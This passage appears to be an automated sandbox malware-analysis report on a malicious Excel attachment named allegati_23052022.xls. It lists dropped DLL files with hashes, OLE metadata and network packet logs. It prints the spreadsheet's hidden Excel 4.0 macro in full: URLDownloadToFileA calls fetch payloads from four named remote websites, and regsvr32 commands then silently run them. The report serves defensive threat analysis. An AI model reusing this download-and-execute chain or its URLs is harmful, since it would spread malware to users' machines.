                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\cusoa3.ocx

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Users\user\cusoa4.ocx

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\IyXmToN\lzIgCVr.dll (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\KIMRaXPqDerXJoZF\aRgQEkQ.dll (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\TURzt\TXqeznNbFanh.dll (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\TlAadbHyBMqq\YRFxrLtktkh.dll (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):850432
                                                                            Entropy (8bit):6.537754717984194
                                                                            Encrypted:false
                                                                            SSDEEP:12288:R2w7LE6jYIYNtjDPE8SI1W5vtHrBNCC3VlClIpRHhc+o6OUo6VlClIpRHhc+o6Oh:R2w7wKZEkhI1W5vtHrHDdGDQ9a
                                                                            MD5:5D1006079971CA12EF0705445F44BBD0
                                                                            SHA1:FEEA82CBD217F0163131E7672F9CBAA8C4DA572D
                                                                            SHA-256:DB90469B801F7A48429E66EE1BD02C4A93619F72A426F07A5D18534697D19C0E
                                                                            SHA-512:308FA0F1B406041290DBD2BD24FBF11A1928C638BD8DDEC83DCFFFDB9F458CE9A125089D7ADDC336005983DC239504521958044D0662A5F1074974BFA263B463
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....P...P...P.3{P...P.3mP...P...P...P.hkP...P.h{P2..P.hxP7..P.hdP...P.hlP...P.hjP...P.hnP...PRich...P........................PE..d....o.b.........." .....,...........................................................!.............................................. ...P...............d......P^...........P.......................................................@......H...@....................text...D+.......,.................. ..`.rdata..p....@.......0..............@..@.data...........4..................@....pdata..P^.......`..................@..@.rsrc....d.......f...b..............@..@.reloc...0...P...2..................@..B................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon May 23 10:04:20 2022, Security: 0
                                                                            Entropy (8bit):5.805310604835741
                                                                            TrID:
                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                            File name:allegati_23052022.xls
                                                                            File size:54784
                                                                            MD5:045b8e2ecf49c8e90db6711efe0f1cc1
                                                                            SHA1:a2d6a1b1ff6f65555084251f2889a07f4c6af963
                                                                            SHA256:6b606a36d7de856b6f0bc3bc896ac6352fbdd57e0eca567e33e6ce360a3e6d33
                                                                            SHA512:006c21ce3114e8708fbe59562ef4cadf8796b37104cbae1e2c9a5e3d7e363feced13e1e481778024fcb9d4fb50c476777002e24d909874555f01d2850e9f8d15
                                                                            SSDEEP:1536:LPKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+bSgNeEYL8ECyn:rKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMN
                                                                            TLSH:ED33F846BA5A995DF916873048D74BA96323FC314FAB07833669F3246FFD9E05A0310B
                                                                            File Content Preview:........................>.......................i...........................h..................................................................................................................................................................................

                                                                            File Icon

                                                                            Icon Hash:e4eea286a4b4bcb4

                                                                            Static OLE Info

                                                                            General

                                                                            Document Type:OLE
                                                                            Number of OLE Files:1

                                                                            OLE File "allegati_23052022.xls"

                                                                            Indicators
                                                                            Has Summary Info:
                                                                            Application Name:Microsoft Excel
                                                                            Encrypted Document:False
                                                                            Contains Word Document Stream:False
                                                                            Contains Workbook/Book Stream:True
                                                                            Contains PowerPoint Document Stream:False
                                                                            Contains Visio Document Stream:False
                                                                            Contains ObjectPool Stream:False
                                                                            Flash Objects Count:0
                                                                            Contains VBA Macros:False
                                                                            Summary
                                                                            Code Page:1251
                                                                            Author:Dream
                                                                            Last Saved By:TYHRETH
                                                                            Create Time:2015-06-05 18:19:34
                                                                            Last Saved Time:2022-05-23 09:04:20
                                                                            Creating Application:Microsoft Excel
                                                                            Security:0
                                                                            Document Summary
                                                                            Document Code Page:1251
                                                                            Thumbnail Scaling Desired:False
                                                                            Company:
                                                                            Contains Dirty Links:False
                                                                            Shared Document:False
                                                                            Changed Hyperlinks:False
                                                                            Application Version:1048576

                                                                            Streams

                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                            General
                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                            File Type:data
                                                                            Stream Size:4096
                                                                            Entropy:0.492777495693
                                                                            Base64 Encoded:False
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . H . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G
                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 48 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00
                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                            General
                                                                            Stream Path:\x5SummaryInformation
                                                                            File Type:data
                                                                            Stream Size:4096
                                                                            Entropy:0.281284383303
                                                                            Base64 Encoded:False
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . T Y H R E T H . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . B . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 44730
                                                                            General
                                                                            Stream Path:Workbook
                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                            Stream Size:44730
                                                                            Entropy:6.6028106379
                                                                            Base64 Encoded:True
                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T Y H R E T H B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 07 00 00 54 59 48 52 45 54 48 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                            Macro 4.0 Code

                                                                            Name:PKEKPPGEKKPGE
                                                                            Type:4
                                                                            Final:False
                                                                            Visible:False
                                                                            Protected:False
                                                                            PKEKPPGEKKPGE4False0Falsepre2,5,=FORMULA()=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/","..\cusoa1.ocx",0,0)",F13)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ocalogullari.com/inc/Wcm82enrs8/","..\cusoa2.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://myphamcuatui.com/assets/OPVeVSpO/","..\cusoa3.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx")",F25)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/","..\cusoa4.ocx",0,0)",F27)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx")",F31)=FORMULA("=RETURN()",F35)
                                                                            Name:PKEKPPGEKKPGE
                                                                            Type:4
                                                                            Final:False
                                                                            Visible:False
                                                                            Protected:False
                                                                            PKEKPPGEKKPGE4False0Falsepost2,5,=FORMULA()=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/","..\cusoa1.ocx",0,0)",F13)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ocalogullari.com/inc/Wcm82enrs8/","..\cusoa2.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://myphamcuatui.com/assets/OPVeVSpO/","..\cusoa3.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx")",F25)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/","..\cusoa4.ocx",0,0)",F27)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx")",F31)=FORMULA("=RETURN()",F35)12,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newkano.com/wp-admin/66rIsrVwoPKUsjcAs/","..\cusoa1.ocx",0,0)16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx")18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ocalogullari.com/inc/Wcm82enrs8/","..\cusoa2.ocx",0,0)20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx")22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://myphamcuatui.com/assets/OPVeVSpO/","..\cusoa3.ocx",0,0)24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx")26,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sieuthiphutungxenang.com/old_source/9boJQZpTSdQE/","..\cusoa4.ocx",0,0)30,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx")34,5,=RETURN()

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 23, 2022 18:59:06.733620882 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:06.733664989 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:06.733740091 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:06.742887974 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:06.742948055 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.369816065 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.370083094 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:07.385442972 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:07.385487080 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.385855913 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.385962963 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:07.683571100 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:07.724518061 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.906100988 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.906158924 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.906306982 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:07.906387091 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:07.906526089 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.108294964 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.108453035 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.108488083 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.108555079 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.109141111 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.109214067 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.109234095 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.109249115 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.109307051 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.109626055 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.109731913 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.109745979 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.109798908 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.311431885 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.311594963 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.311619043 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.311640978 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.311728954 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.311748981 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.311789989 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.311805010 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.312180996 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.312277079 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.312287092 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.312320948 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.312890053 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.312963963 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.312974930 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.313007116 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.313549995 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.313632965 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.313642979 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.313678026 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.314229965 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.314310074 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.314321041 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.314357996 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.314759016 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.314825058 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.314831972 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.314865112 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.513932943 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.514141083 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.514168978 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.514233112 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.514763117 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.514889956 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.514928102 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.514993906 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.515408993 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.515515089 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.515532970 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.515597105 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.516074896 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.516174078 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.516191959 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.516267061 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.516716957 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.516808033 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.516846895 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.516917944 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.517432928 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.517539024 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.517554998 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.517617941 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.518296957 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.518390894 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.518431902 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.518496990 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.518974066 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.519090891 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.519109011 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.519191980 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.519643068 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.519742966 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.519785881 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.519845009 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.520407915 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.520503998 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.520545959 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.520616055 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.521064997 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.521167040 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.521194935 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.521254063 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.521811008 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.521902084 CEST49173443192.168.2.22103.45.230.202
                                                                            May 23, 2022 18:59:08.521919966 CEST44349173103.45.230.202192.168.2.22
                                                                            May 23, 2022 18:59:08.521980047 CEST49173443192.168.2.22103.45.230.202
